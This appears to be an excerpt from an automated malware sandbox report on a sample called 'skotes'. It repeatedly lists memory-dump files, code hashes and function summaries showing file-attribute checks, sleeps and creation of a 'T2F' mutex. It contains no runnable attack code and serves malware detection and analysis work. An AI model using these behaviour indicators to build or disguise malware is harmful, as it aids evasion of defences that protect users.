Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 009fd378c77abdcc572005f1b8864396ef85762fb02238d09b529474469cab20
Instruction ID: 058376136b2a7730e9b9ac35bdbcedee1ef6c199b30da467ad49636e87716ab3
Opcode Fuzzy Hash: 009fd378c77abdcc572005f1b8864396ef85762fb02238d09b529474469cab20
Instruction Fuzzy Hash: 77314A72B002009BEB08DBB8DD8979DB7629B86314F20867EE004BB3D1D77D5990865A

Function 0040A2E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040A2E6
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 893c7a0de38fc4f7ed7c78e3f61a5cbf2752f8d9de511d55954eaf702b9ce0c4
Instruction ID: 4d2c35c50eb53231a8edc40f2e4911fb308d9ecce43308ed59bc103b005a3e1f
Opcode Fuzzy Hash: 893c7a0de38fc4f7ed7c78e3f61a5cbf2752f8d9de511d55954eaf702b9ce0c4
Instruction Fuzzy Hash: 8C3148727003049BEB18DB78DD847ADB772AB92314F20862AE414BB3D5C77D9990875A

Function 0040A418 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040A41B
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 87006584026a941f8c7f4d68d4269007bc4fc4b0b78401f928017a29b7df9cef
Instruction ID: 8ded25280a1f5c11b3499ef39046ffdbc5a15a68a83709a914929af284375efd
Opcode Fuzzy Hash: 87006584026a941f8c7f4d68d4269007bc4fc4b0b78401f928017a29b7df9cef
Instruction Fuzzy Hash: 98314E71B0030097EB08DBB8DDC97ADB772DF86314F24862EE014AB3D6D7BD5990865A

Function 0040A54D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040A550
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 8d1838545a7fc37be6e61097276a2d312759a3380fa8bef91a6b5db26cdc42fc
Instruction ID: f69955ecfec21f6d5eadb5ab1b3e6136e73b0b418b43ad6571c31a6173a91d3c
Opcode Fuzzy Hash: 8d1838545a7fc37be6e61097276a2d312759a3380fa8bef91a6b5db26cdc42fc
Instruction Fuzzy Hash: 9B3160717002049BEB08DB78CD897ADB772EB86318F24862EE004BB3D1C77D9990875A

Function 0040A682 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040A685
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: dfc5521db091e2aa0dbd715596dce7a2b4ee3c9531447f893da14cf81863651e
Instruction ID: 9b96316b4a2b61d1f3b29ea77259f89c479777843a3dc570b0ad2de258b4b924
Opcode Fuzzy Hash: dfc5521db091e2aa0dbd715596dce7a2b4ee3c9531447f893da14cf81863651e
Instruction Fuzzy Hash: CC314C717003049BEB08DB78CD89BAEB772DB86314F24862AE014AB3D5C77D9990865A

Function 0040A7B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040A7BA
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
